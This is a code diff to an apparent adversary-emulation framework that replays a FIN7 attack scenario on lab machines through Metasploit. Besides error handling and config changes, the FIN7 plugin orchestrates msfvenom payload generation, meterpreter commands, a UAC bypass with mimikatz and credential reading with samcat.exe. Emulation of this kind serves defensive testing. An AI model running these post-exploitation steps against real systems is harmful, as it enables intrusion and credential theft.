Added Metasploit exception.

app/config.py

@@ -50,6 +50,14 @@ class MachineConfig():
 
         return self.raw_config["vm_name"]
 
+    def get_nicknames(self):
+        """ Gets the nicknames """
+
+        if "nicknames" in self.raw_config:
+            return self.raw_config["nicknames"] or []
+
+        return []
+
     def vmcontroller(self):
         """ Returns the vm controller. lowercase """
 

app/exceptions.py

@@ -20,3 +20,7 @@ class CalderaError(Exception):
 
 class NetworkError(Exception):
     """ Network connection (like ssh) can not be established """
+
+
+class MetasploitError(Exception):
+    """ Metasploit had an error """

app/metasploit.py

@@ -6,6 +6,7 @@ from app.attack_log import AttackLog
 from app.interface_sfx import CommandlineColors
 import time
 import socket
+from app.exceptions import MetasploitError
 
 
 import os
@@ -79,7 +80,14 @@ class Metasploit():
         """
 
         # Get_ip can also return a network name. Matching a session needs a real ip
-        ip = socket.gethostbyname(target.get_ip())
+        name_resolution_worked = True
+        try:
+            ip = socket.gethostbyname(target.get_ip())
+        except socket.gaierror:
+            ip = target.get_ip()   # Limp on feature if we can not get a name resolution
+            name_resolution_worked = False
+            print(f"Name resolution for {target.get_ip()} failed. Sessions are: {self.get_client().sessions.list}")
+            # TODO: Try to get the ip address from kali system
 
         retries = 100
         while retries > 0:
@@ -90,7 +98,7 @@ class Metasploit():
 
             time.sleep(1)
             retries -= 1
-        return None  # TODO: Better error handlign as soon as we know where we use it
+        raise MetasploitError(f"Could not find session for {target.get_ip()} Name resolution worked: {name_resolution_worked}")
 
     def meterpreter_execute(self, cmds: [str], session_number: int, delay=0) -> str:
         """ Executes commands on the meterpreter, returns results read from shell

plugins/default/adversary_emulations/FIN7/fin7_section1.py

@@ -128,6 +128,9 @@ class FIN7Plugin(AttackPlugin):
         # -f C                : output is c code
         # --encrypt xor       : xor encrypt the results
         # --encrypt-key m     : the encryption key
+
+        self.attacker_machine_plugin.remote_run("sudo apt install msfpc")  # MSFVenom needs to be installed
+
         venom = MSFVenom(self.attacker_machine_plugin, hotelmanager, self.attack_logger)
         venom.generate_and_deploy(payload=self.payload_type_1,
                                   architecture="x64",
@@ -179,11 +182,10 @@ class FIN7Plugin(AttackPlugin):
             f"{CommandlineColors.OKCYAN}Execute arp through meterpreter{CommandlineColors.ENDC}", 1)
         print(metasploit.meterpreter_execute_on(["arp"], hotelmanager))
         # powershell: nslookup to query domain controler(hoteldc) for ip from ARP (Caldera ?) https://attack.mitre.org/techniques/T1018/
-        # TODO: Add real <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
+        # TODO: Add a new machine in config as <itadmin> ip. Re-activate. This command caused trouble afterwards (uploading mimikatz). Maybe it is because of an error
-        # itadmin = "127.0.0.1"
+        itadmin = self.get_target_by_name("itadmin")
-        # self.attack_logger.vprint(
+        self.attack_logger.vprint(f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
-        #    f"{CommandlineColors.OKCYAN}Execute nslookup through meterpreter{CommandlineColors.ENDC}", 1)
+        print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
-        # print(metasploit.meterpreter_execute_on([f"execute -f nslookup.exe -H -i -a '{itadmin}'"], hotelmanager))
 
         # Copy step 5 attack tools to attacker
 
@@ -215,7 +217,6 @@ class FIN7Plugin(AttackPlugin):
             self.attack_logger.vprint(
                 f"{CommandlineColors.OKCYAN}Execute UAC bypass (and mimikatz) through meterpreter{CommandlineColors.ENDC}", 1)
             print(metasploit.meterpreter_execute_on([execute_samcats], hotelmanager, delay=20))
-            # TODO: Make it more reliable. Also test which OS versions are working properly. It worked at least once
 
         # samcat.exe: reads local credentials https://attack.mitre.org/techniques/T1003/001/
 
@@ -313,8 +314,8 @@ class FIN7Plugin(AttackPlugin):
         self.step1()
         self.step2()
         self.step3()  # Done and works
-        self.step4()
+        self.step4()  # Partial - with a hack
-        self.step5()
+        self.step5()  # Done and quite ok
         self.step6()
         self.step7()
         self.step8()

plugins/default/adversary_emulations/FIN7/local_experiment_config.yaml

@@ -57,8 +57,10 @@ targets:
 
     vm_name: target2
 
+    # TODO: itadmin must be moved to another target
     nicknames:
       - hotelmanager
+      - itadmin
 
     os: windows
     paw: target2w